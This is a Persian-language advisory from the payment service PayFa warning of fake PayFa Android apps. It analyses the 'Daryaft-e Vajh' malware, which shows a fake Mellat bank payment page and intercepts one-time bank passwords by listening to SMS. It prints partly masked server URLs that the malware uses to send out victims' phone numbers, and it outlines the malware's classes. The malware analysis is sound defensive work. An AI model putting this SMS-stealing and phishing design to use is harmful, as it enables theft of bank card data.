هشدار جدی: اپلیکیشن‌های جعلی پی فا و خطرات سرقت اطلاعات بانکی

پی فا

در دنیای پویای پرداخت‌های آنلاین، “پی فا” گام‌های بلندی برداشته و به موفقیت‌های چشمگیری دست یافته است. اما این مسیر پرفراز و نشیب، خالی از چالش‌ها نبوده است. همواره افرادی هستند که با هدف سوءاستفاده، سعی در ایجاد اختلال در این پیشرفت‌ها دارند.

متاسفانه، کلاهبرداران با جعل اپلیکیشن پی فا، به دنبال فریب کاربران و سرقت اطلاعات حساس بانکی آن‌ها هستند. این افراد با سوءاستفاده از نام و اعتبار پی فا، حملات فیشینگ را سازماندهی کرده و با استفاده از بدافزارهای مخرب، اطلاعات کاربران را به سرقت می‌برند. پی فا ضمن محکوم کردن این اقدامات مجرمانه، نسبت به عواقب ناگوار این اپلیکیشن‌های جعلی برای کاربران بی‌اطلاع، ابراز نگرانی می‌کند.

مهم است که کاربران گرامی توجه داشته باشند که در حال حاضر، پی فا هیچ اپلیکیشنی برای سیستم عامل‌های iOS و Android ارائه نکرده است. تنها منبع معتبر برای دسترسی به خدمات پی فا، وب‌سایت رسمی آن به آدرس‌های payfa.ir و payfa.com است. پیش از این، پی فا در اطلاعیه‌های رسمی خود، عدم ارائه اپلیکیشن و عدم مسئولیت در قبال سوءاستفاده‌های احتمالی را اعلام کرده بود.

آشنایی با بدافزار “دریافت وجه” و روش‌های فریب کاربران

اخیراً، بدافزاری با نام “دریافت وجه” با سوءاستفاده از آیکون پی فا، برای فریب کاربران و سرقت اطلاعات بانکی آن‌ها منتشر شده است. این بدافزار که با ترفند بازاریابی ویروسی در کانال‌های مختلف با عنوان “ادد کنید، پول بگیرید” دست به دست می‌شود، توجه تیم فنی پی فا را به خود جلب کرده است. در ادامه، با استفاده از تکنیک مهندسی معکوس، به بررسی فنی این بدافزار می‌پردازیم.

نحوه عملکرد بدافزار “دریافت وجه”

پس از نصب و اجرا، این بدافزار ابتدا از کاربر اجازه دسترسی به ارسال و خواندن پیامک‌ها را درخواست می‌کند. سپس، شماره تلفن همراه قربانی را دریافت کرده و به یک سرور مشخص ارسال می‌کند:

https://exXXeXXs-noXXXs.XX/request.php?phone=09123456789&port=88084&info=install

نحوه عملکرد بد افزار

پس از عبور از صفحه ابتدایی، بدافزار با استفاده از کامپوننت (WebView) یک صفحه جعلی مشابه درگاه پرداخت “به‌پرداخت ملت” را به نمایش می‌گذارد. تصاویر موجود نشان می‌دهد که این صفحات جعلی با دقت طراحی شده‌اند و زمینه را برای فریب کاربران فراهم می‌کنند.

هنگامی که قربانی اطلاعات کارت بانکی خود را در این صفحه جعلی وارد می‌کند، این اطلاعات توسط سرور بدافزار دریافت می‌شود. در همین لحظه، پیامک حاوی رمز پویا از بانک، با استفاده از تابع (onReceive) کلاس (BroadcastReceiver) به سرور بدافزار ارسال می‌شود.

این بدافزار با رصد پیامک‌های دریافتی قربانی، به محض دریافت رمز پویا، آن را نیز دریافت می‌کند. در این مرحله، مجرمان به اطلاعات کارت بانکی و رمز پویای قربانی دسترسی کامل دارند. در ادامه، مراحل تکمیلی این بدافزار جعلی را مشاهده می‌کنید:

1_ بررسی کد بدافزار

بررسی کد بد افزار

2_ MainActivity.java

  • دریافت مجوز استفاده از سرویس SMS
  • بررسی شماره موبایل ورودی
  • ثبت شماره موبایل قربانی در سرور بدافزار
  • انتقال قربانی به MainActivity2

3- MainActivity2.java

نمایش صفحه جعلی پرداخت

https://xsl- shapark.XXX/Ads/?e=88084&P=Mellat

4- connect.java

ارسال اطلاعات به سرور بدافزار (شماره موبایل، پیامک)

5- MyReceiver.java

شنود پیامک و ارسال متن پیامک به کلاس (connect) جهت ارسال به سرور بدافزار

در پایان، پی فا به کاربران خود هشدار می‌دهد که از نصب و استفاده از اپلیکیشن‌های غیرمجاز و جعلی خودداری کنند. این شرکت تأکید می‌کند که هیچ مسئولیتی در قبال خطرات احتمالی ناشی از سوء استفاده از نام پی فا ندارد و تنها از طریق مراجع رسمی و معتبر خود، برنامه‌هایش را به کاربران معرفی می‌کند. استفاده غیرمجاز از نام و هویت پی فا، اقدامی غیرقانونی است و متخلفان تحت پیگرد قانونی قرار خواهند گرفت.

آیا این مقاله برای شما مفید بود؟
تقریبا
خیر